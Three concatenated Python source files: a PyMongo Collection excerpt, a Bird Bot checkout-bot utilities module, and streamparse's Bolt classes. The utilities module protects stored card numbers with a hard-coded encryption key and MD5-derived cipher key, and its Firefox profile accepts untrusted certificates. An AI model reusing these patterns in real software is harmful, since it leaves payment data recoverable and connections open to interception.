with self._socket_for_reads(session) as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)
else:
res = self._command(sock_info, cmd, slave_ok,
collation=collation, session=session)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
allowable_errors=[_NO_OBJ_ERROR],
collation=collation, session=session,
retryable_write=retryable_write)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
          {u'_id': 665, u'done': False, u'count': 25}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
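        The *array_filters* option (MongoDB 3.6+) restricts which array
        elements an update touches. A sketch, assuming a hypothetical
        ``grades`` array field::

          >>> db.test.find_one_and_update(
          ...     {'_id': 665},
          ...     {'$set': {'grades.$[elem]': 100}},
          ...     array_filters=[{'elem': {'$gte': 90}}],
          ...     return_document=ReturnDocument.AFTER)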
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR], collation=collation,
session=session, retryable_write=retryable_write)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
utils.py
|
try:
from Crypto import Random
from Crypto.Cipher import AES
except ImportError:
from Cryptodome import Random
from Cryptodome.Cipher import AES
from colorama import init, Fore, Back, Style
from datetime import datetime
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.common import exceptions
from webhook import DiscordWebhook, DiscordEmbed
import json, platform, darkdetect, random, settings, threading, hashlib, base64
normal_color = Fore.CYAN
e_key = "YnJ1aG1vbWVudA==".encode()
BLOCK_SIZE=16
if platform.system() == "Windows":
init(convert=True)
else:
init()
print(normal_color + "Welcome To Bird Bot")
class BirdLogger:
def ts(self):
return str(datetime.now())[:-7]
def normal(self,task_id,msg):
print(normal_color + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def alt(self,task_id,msg):
print(Fore.MAGENTA + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def error(self,task_id,msg):
print(Fore.RED + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def success(self,task_id,msg):
print(Fore.GREEN + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
class Encryption:
def encrypt(self,msg):
IV = Random.new().read(BLOCK_SIZE)
aes = AES.new(self.trans(e_key), AES.MODE_CFB, IV)
return base64.b64encode(IV + aes.encrypt(msg.encode("utf-8")))
def decrypt(self,msg):
msg = base64.b64decode(msg)
IV = msg[:BLOCK_SIZE]
aes = AES.new(self.trans(e_key), AES.MODE_CFB, IV)
return aes.decrypt(msg[BLOCK_SIZE:])
def trans(self,key):
return hashlib.md5(key).digest()
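# Illustrative round trip with the Encryption helper above (values are made up;
# the hard-coded e_key defined earlier is what keys the cipher):
#
#   token = Encryption().encrypt("4111111111111111")   # base64(IV + ciphertext)
#   plain = Encryption().decrypt(token).decode("utf-8")
#
# encrypt() prepends a fresh random IV to the ciphertext before base64-encoding,
# and decrypt() slices that IV back off, so nothing besides the token needs storing.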
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
file.close()
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
file.close()
def get_profile(profile_name):
profiles = return_data("./data/profiles.json")
for p in profiles:
if p["profile_name"] == profile_name:
try:
p["card_number"] = (Encryption().decrypt(p["card_number"].encode("utf-8"))).decode("utf-8")
except ValueError:
pass
return p
return None
def get_proxy(list_name):
if list_name == "Proxy List" or list_name == "None":
return False
proxies = return_data("./data/proxies.json")
for proxy_list in proxies:
if proxy_list["list_name"] == list_name:
return format_proxy(random.choice(proxy_list["proxies"].splitlines()))
return None
def format_proxy(proxy):
try:
proxy_parts = proxy.split(":")
ip, port, user, passw = proxy_parts[0], proxy_parts[1], proxy_parts[2], proxy_parts[3]
return {
"http": "http://{}:{}@{}:{}".format(user, passw, ip, port),
"https": "https://{}:{}@{}:{}".format(user, passw, ip, port)
}
except IndexError:
return {"http": "http://" + proxy, "https": "https://" + proxy}
def send_webhook(webhook_type,site,profile,task_id,image_url):
    if settings.webhook != "":
webhook = DiscordWebhook(url=settings.webhook, username="Bird Bot", avatar_url="https://i.imgur.com/fy26LbM.png")
if webhook_type == "OP":
if not settings.webhook_on_order:
return
embed = DiscordEmbed(title="Order Placed",color=0x34c693)
elif webhook_type == "B":
if not settings.webhook_on_browser:
return
embed = DiscordEmbed(title="Complete Order in Browser",color=0xf2a689)
elif webhook_type == "PF":
if not settings.webhook_on_failed:
return
embed = DiscordEmbed(title="Payment Failed",color=0xfc5151)
else:
embed = DiscordEmbed(title=webhook_type, color=0xfc5151)
embed.set_footer(text="Via Bird Bot",icon_url="https://i.imgur.com/fy26LbM.png")
embed.add_embed_field(name="Site", value=site,inline=True)
embed.add_embed_field(name="Profile", value=profile,inline=True)
embed.add_embed_field(name="Task ID", value=task_id,inline=True)
embed.set_thumbnail(url=image_url)
webhook.add_embed(embed)
try:
webhook.execute()
        except Exception:
pass
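# Example call (all values hypothetical); only fires when settings.webhook is
# configured and the matching settings.webhook_on_* flag is enabled:
#
#   send_webhook("OP", "Target", "main profile", 3, "https://example.com/item.png")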
def open_browser(link,cookies):
threading.Thread(target = start_browser, args=(link,cookies)).start()
def start_browser(link,cookies):
options = Options()
options.headless = False
options.log.level = "trace"
firefox_profile = webdriver.FirefoxProfile()
firefox_profile.accept_untrusted_certs = True
driver = webdriver.Firefox(
options=options,
firefox_profile=firefox_profile,
service_log_path="/dev/null",
)
driver.get(link)
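    # Selenium only accepts cookies for the domain of the currently loaded
    # page, so the link is opened once before add_cookie() and then reloaded
    # afterwards so the injected session cookies actually take effect.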
for cookie in cookies:
driver.add_cookie({
"name": cookie["name"],
"value" : cookie["value"],
"domain" : cookie["domain"]
})
driver.get(link)
|
bolt.py
|
"""Base Bolt classes."""
from __future__ import absolute_import, print_function, unicode_literals
from collections import defaultdict
import os
import signal
import sys
import threading
import time
import warnings
import logging
from six import iteritems, reraise, PY3
from .base import Component
from .ipc import (read_handshake, read_tuple, read_task_ids, send_message,
json, Tuple)
log = logging.getLogger('streamparse.bolt')
class Bolt(Component):
"""The base class for all streamparse bolts.
For more information on bolts, consult Storm's
`Concepts documentation <http://storm.incubator.apache.org/documentation/Concepts.html>`_.
**Example**:
.. code-block:: python
from streamparse.bolt import Bolt
class SentenceSplitterBolt(Bolt):
def process(self, tup):
sentence = tup.values[0]
for word in sentence.split(" "):
self.emit([word])
"""
auto_anchor = True
"""A ``bool`` indicating whether or not the bolt should automatically
anchor emits to the incoming tuple ID. Tuple anchoring is how Storm
provides reliability, you can read more about `tuple anchoring in Storm's
docs <https://storm.incubator.apache.org/documentation/Guaranteeing-message-processing.html#what-is-storms-reliability-api>`_.
Default is ``True``.
"""
auto_ack = True
"""A ``bool`` indicating whether or not the bolt should automatically
acknowledge tuples after ``process()`` is called. Default is ``True``.
"""
auto_fail = True
"""A ``bool`` indicating whether or not the bolt should automatically fail
tuples when an exception occurs when the ``process()`` method is called.
Default is ``True``.
"""
# Using a list so Bolt and subclasses can have more than one current_tup
_current_tups = []
def initialize(self, storm_conf, context):
"""Called immediately after the initial handshake with Storm and before
the main run loop. A good place to initialize connections to data
sources.
:param storm_conf: the Storm configuration for this Bolt. This is the
configuration provided to the topology, merged in
with cluster configuration on the worker node.
:type storm_conf: dict
:param context: information about the component's place within the
topology such as: task IDs, inputs, outputs etc.
:type context: dict
"""
pass
def process(self, tup):
"""Process a single tuple :class:`streamparse.ipc.Tuple` of input
This should be overridden by subclasses.
:class:`streamparse.ipc.Tuple` objects contain metadata about which
component, stream and task it came from. The actual values of the
tuple can be accessed by calling ``tup.values``.
:param tup: the tuple to be processed.
:type tup: streamparse.ipc.Tuple
"""
raise NotImplementedError()
def emit(self, tup, stream=None, anchors=None, direct_task=None,
need_task_ids=None):
"""Emit a new tuple to a stream.
:param tup: the Tuple payload to send to Storm, should contain only
JSON-serializable data.
:type tup: list
:param stream: the ID of the stream to emit this tuple to. Specify
``None`` to emit to default stream.
:type stream: str
        :param anchors: IDs of the tuples (or :class:`streamparse.ipc.Tuple`
instances) which the emitted tuples should be anchored
to. If ``auto_anchor`` is set to ``True`` and
you have not specified ``anchors``, ``anchors`` will be
set to the incoming/most recent tuple ID(s).
:type anchors: list
:param direct_task: the task to send the tuple to.
:type direct_task: int
        :param need_task_ids: indicate whether or not you'd like the task IDs
                              the tuple was emitted to (default: ``True``).
:type need_task_ids: bool
:returns: a ``list`` of task IDs that the tuple was sent to. Note that
when specifying direct_task, this will be equal to
``[direct_task]``. If you specify ``need_task_ids=False``,
this function will return ``None``.
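        A minimal anchoring sketch inside a bolt's ``process`` method (the
        field access is illustrative)::

            def process(self, tup):
                word = tup.values[0]
                self.emit([word.upper()], anchors=[tup])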
"""
if not isinstance(tup, list):
raise TypeError('All tuples must be lists, received {!r} instead.'
.format(type(tup)))
msg = {'command': 'emit', 'tuple': tup}
if anchors is None:
anchors = self._current_tups if self.auto_anchor else []
msg['anchors'] = [a.id if isinstance(a, Tuple) else a for a in anchors]
if stream is not None:
msg['stream'] = stream
if direct_task is not None:
msg['task'] = direct_task
if need_task_ids is None:
need_task_ids = True
elif need_task_ids is False:
# only need to send on False, Storm's default is True
msg['need_task_ids'] = need_task_ids
send_message(msg)
        if need_task_ids:
downstream_task_ids = [direct_task] if direct_task is not None \
else read_task_ids()
return downstream_task_ids
else:
return None
def emit_many(self, tuples, stream=None, anchors=None, direct_task=None,
need_task_ids=None):
"""Emit multiple tuples.
:param tuples: a ``list`` containing ``list`` s of tuple payload data
to send to Storm. All tuples should contain only
JSON-serializable data.
:type tuples: list
        :param stream: the ID of the stream to emit these tuples to. Specify
``None`` to emit to default stream.
:type stream: str
        :param anchors: IDs of the tuples (or :class:`streamparse.ipc.Tuple`
instances) which the emitted tuples should be anchored
to. If ``auto_anchor`` is set to ``True`` and
you have not specified ``anchors``, ``anchors`` will be
set to the incoming/most recent tuple ID(s).
:type anchors: list
:param direct_task: indicates the task to send the tuple to.
:type direct_task: int
        :param need_task_ids: indicate whether or not you'd like the task IDs
                              the tuple was emitted to (default: ``True``).
:type need_task_ids: bool
"""
if not isinstance(tuples, list):
            raise TypeError('tuples should be a list of lists, received {!r} '
                            'instead.'.format(type(tuples)))
all_task_ids = []
for tup in tuples:
all_task_ids.append(self.emit(tup, stream=stream, anchors=anchors,
direct_task=direct_task,
need_task_ids=need_task_ids))
return all_task_ids
def ack(self, tup):
"""Indicate that processing of a tuple has succeeded.
:param tup: the tuple to acknowledge.
:type tup: str or Tuple
"""
tup_id = tup.id if isinstance(tup, Tuple) else tup
send_message({'command': 'ack', 'id': tup_id})
def fail(self, tup):
"""Indicate that processing of a tuple has failed.
:param tup: the tuple to fail (``id`` if ``str``).
:type tup: str or Tuple
"""
tup_id = tup.id if isinstance(tup, Tuple) else tup
send_message({'command': 'fail', 'id': tup_id})
def run(self):
"""Main run loop for all bolts.
Performs initial handshake with Storm and reads tuples handing them off
to subclasses. Any exceptions are caught and logged back to Storm
prior to the Python process exiting.
Subclasses should **not** override this method.
"""
storm_conf, context = read_handshake()
self._setup_component(storm_conf, context)
try:
self.initialize(storm_conf, context)
while True:
self._current_tups = [read_tuple()]
self.process(self._current_tups[0])
if self.auto_ack:
self.ack(self._current_tups[0])
# reset so that we don't accidentally fail the wrong tuples
# if a successive call to read_tuple fails
self._current_tups = []
except Exception as e:
log_msg = "Exception in {}.run()".format(self.__class__.__name__)
if len(self._current_tups) == 1:
tup = self._current_tups[0]
log_msg = "{} while processing {!r}".format(log_msg, tup)
self.raise_exception(e, tup)
if self.auto_fail:
self.fail(tup)
log.error(log_msg, exc_info=True)
sys.exit(1)
class BatchingBolt(Bolt):
"""A bolt which batches tuples for processing.
Batching tuples is unexpectedly complex to do correctly. The main problem
    is that all bolts are single-threaded. The difficulty comes when the
    topology is shutting down, because Storm stops feeding the bolt tuples. If
    the bolt is blocked waiting on stdin, then it can't process any waiting
    tuples, or even ack ones that were asynchronously written to a data store.
    This bolt helps with that by grouping tuples based on a time interval and
    then processing them on a worker thread.
To use this class, you must implement ``process_batch``. ``group_key`` can
be optionally implemented so that tuples are grouped before
``process_batch`` is even called.
**Example**:
.. code-block:: python
from streamparse.bolt import BatchingBolt
class WordCounterBolt(BatchingBolt):
secs_between_batches = 5
def group_key(self, tup):
word = tup.values[0]
return word # collect batches of words
def process_batch(self, key, tups):
# emit the count of words we had per 5s batch
self.emit([key, len(tups)])
"""
auto_anchor = True
"""A ``bool`` indicating whether or not the bolt should automatically
anchor emits to the incoming tuple ID. Tuple anchoring is how Storm
provides reliability, you can read more about `tuple anchoring in Storm's
docs <https://storm.incubator.apache.org/documentation/Guaranteeing-message-processing.html#what-is-storms-reliability-api>`_.
Default is ``True``.
"""
auto_ack = True
"""A ``bool`` indicating whether or not the bolt should automatically
acknowledge tuples after ``process_batch()`` is called. Default is
``True``.
"""
auto_fail = True
"""A ``bool`` indicating whether or not the bolt should automatically fail
tuples when an exception occurs when the ``process_batch()`` method is
called. Default is ``True``.
"""
secs_between_batches = 2
"""The time (in seconds) between calls to ``process_batch()``. Note that if
there are no tuples in any batch, the BatchingBolt will continue to sleep.
Note: Can be fractional to specify greater precision (e.g. 2.5).
"""
def __init__(self):
super(BatchingBolt, self).__init__()
self.exc_info = None
signal.signal(signal.SIGINT, self._handle_worker_exception)
iname = self.__class__.__name__
threading.current_thread().name = '{}:main-thread'.format(iname)
self._batches = defaultdict(list)
self._batch_lock = threading.Lock()
self._batcher = threading.Thread(target=self._batch_entry)
self._batcher.name = '{}:_batcher-thread'.format(iname)
self._batcher.daemon = True
self._batcher.start()
def group_key(self, tup):
"""Return the group key used to group tuples within a batch.
        By default, returns ``None``, which puts all tuples in a single
        batch, effectively just time-based batching. Override this to create
        multiple batches based on a key.
:param tup: the tuple used to extract a group key
:type tup: Tuple
:returns: Any ``hashable`` value.
"""
return None
def process_batch(self, key, tups):
"""Process a batch of tuples. Should be overridden by subclasses.
:param key: the group key for the list of batches.
:type key: hashable
:param tups: a `list` of :class:`streamparse.ipc.Tuple` s for the group.
:type tups: list
"""
raise NotImplementedError()
def emit(self, tup, **kwargs):
"""Modified emit that will not return task IDs after emitting.
        See :meth:`Bolt.emit` for more information.
:returns: ``None``.
"""
kwargs['need_task_ids'] = False
return super(BatchingBolt, self).emit(tup, **kwargs)
def emit_many(self, tups, **kwargs):
"""Modified emit_many that will not return task IDs after emitting.
        See :meth:`Bolt.emit_many` for more information.
:returns: ``None``.
"""
kwargs['need_task_ids'] = False
return super(BatchingBolt, self).emit_many(tups, **kwargs)
def run(self):
"""Modified and simplified run loop which runs in the main thread since
we only need to add tuples to the proper batch for later processing
in the _batcher thread.
"""
storm_conf, context = read_handshake()
self._setup_component(storm_conf, context)
tup = None
try:
self.initialize(storm_conf, context)
while True:
tup = read_tuple()
group_key = self.group_key(tup)
with self._batch_lock:
self._batches[group_key].append(tup)
except Exception as e:
log.error("Exception in %s.run() while adding %r to batch",
self.__class__.__name__, tup, exc_info=True)
self.raise_exception(e)
def _batch_entry(self):
"""Entry point for the batcher thread."""
try:
while True:
time.sleep(self.secs_between_batches)
with self._batch_lock:
if not self._batches:
# No tuples to save
continue
for key, batch in iteritems(self._batches):
self._current_tups = batch
self.process_batch(key, batch)
if self.auto_ack:
for tup in batch:
self.ack(tup)
self._batches = defaultdict(list)
except Exception as e:
log_msg = ("Exception in {}.run() while processing tuple batch "
"{!r}.".format(self.__class__.__name__,
self._current_tups))
log.error(log_msg, exc_info=True)
self.raise_exception(e, self._current_tups)
if self.auto_fail and self._current_tups:
for tup in self._current_tups:
self.fail(tup)
self.exc_info = sys.exc_info()
os.kill(os.getpid(), signal.SIGINT) # interrupt stdin waiting
def _handle_worker_exception(self, signum, frame):
"""Handle an exception raised in the worker thread.
Exceptions in the _batcher thread will send a SIGINT to the main
thread which we catch here, and then raise in the main thread.
"""
reraise(*self.exc_info)
class BasicBolt(Bolt):
def __init__(self):
super(BasicBolt, self).__init__()
warnings.warn("BasicBolt is deprecated and "
"will be removed in a future streamparse release. "
"Please use Bolt.", DeprecationWarning)
|